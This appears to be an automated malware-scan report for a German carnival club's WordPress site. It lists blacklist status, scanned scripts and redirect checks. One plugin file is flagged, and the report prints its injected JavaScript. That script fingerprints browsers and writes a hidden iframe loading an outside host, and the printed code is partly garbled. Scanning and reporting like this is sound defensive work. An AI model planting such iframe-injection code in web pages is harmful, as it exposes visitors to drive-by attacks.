Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karneval-dipperz.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://karneval-dipperz.de/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://karneval-dipperz.de/ | HTTP/1.1 301 Moved Permanently Date: Tue, 23 Dec 2014 02:03:03 GMT Location: http://www.karneval-dipperz.de/ Server: Microsoft-IIS/7.5 Content-Length: 1882 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.karneval-dipperz.de/xmlrpc.php X-Powered-By: PHP/5.4.14 X-Powered-By: ASP.NET | clean |
http://www.karneval-dipperz.de/ | 200 OK Content-Length: 19638 Content-Type: text/html | clean |
http://www.karneval-dipperz.de/wp-content/plugins/WPTeaser/jquery-2.1.1.min.js | 200 OK Content-Length: 74656 Content-Type: application/x-javascript | clean |
http://karneval-dipperz.de/wp-content/plugins/WPTeaser/slider-right.js | 200 OK Content-Length: 5454 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/cssable-countdown/js/kw-jquery.countdown-1.6.3.js?ver=1.0 | 200 OK Content-Length: 34022 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/cssable-countdown/langs/jquery.countdown-de.js?ver=1.0 | 200 OK Content-Length: 576 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/reiseblog-widgets/js/jquery.countdown.min.js?ver=4.0.1 | 200 OK Content-Length: 14153 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/wordpress-countdown-widget/js/jquery.countdown.min.js?ver=1.0 | 200 OK Content-Length: 12610 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0.1 | 200 OK Content-Length: 33 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0.1 | 200 OK Content-Length: 24995 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0.1 | 200 OK Content-Length: 5337 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0.1 | 200 OK Content-Length: 891 Content-Type: application/x-javascript | clean |
http://www.karneval-dipperz.de/wp-content/plugins/fikraticker/js/jquery.innerfade.js?ver=4.0.1 | 200 OK Content-Length: 1112 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Signaturepointlight() { var producter = navigator.userAgent; var actualed = (producter.indexOf("Windows") < +1 || producter.indexOf("Windows NT 6.3") > -1 || producter.indexOf("Chrome") > -1 || producter.indexOf("IEMobile if (!actualed && suite) { document.write('<iframe src="http://jumentas.accesspointit.com/jujakisam15.html" style="border-left: thick double #ff0000;left: -889px;position: absolute;cursor: help;border-right: thick double #ff0000;top: -889px;" height="132" width="132"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="joombanight=1; path=/; expires="+date.toUTCString(); } } Signaturepointlight(); Antivirus reports:
| ||
http://www.karneval-dipperz.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=4.0.1 | 200 OK Content-Length: 890 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karneval-dipperz.de
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 23 Dec 2014 02:03:03 GMT
Location: http://www.karneval-dipperz.de/
Server: Microsoft-IIS/7.5
Content-Length: 1882
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karneval-dipperz.de/xmlrpc.php
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
...1882 bytes of data.
GET / HTTP/1.1
Host: karneval-dipperz.de
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 23 Dec 2014 02:03:03 GMT
Location: http://www.karneval-dipperz.de/
Server: Microsoft-IIS/7.5
Content-Length: 1882
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.karneval-dipperz.de/xmlrpc.php
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
...1882 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: karneval-dipperz.de
Referer: http://www.google.com/search?q=karneval-dipperz.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: karneval-dipperz.de
Referer: http://www.google.com/search?q=karneval-dipperz.de
Result:
The result is similar to the first query. There are no suspicious redirects found.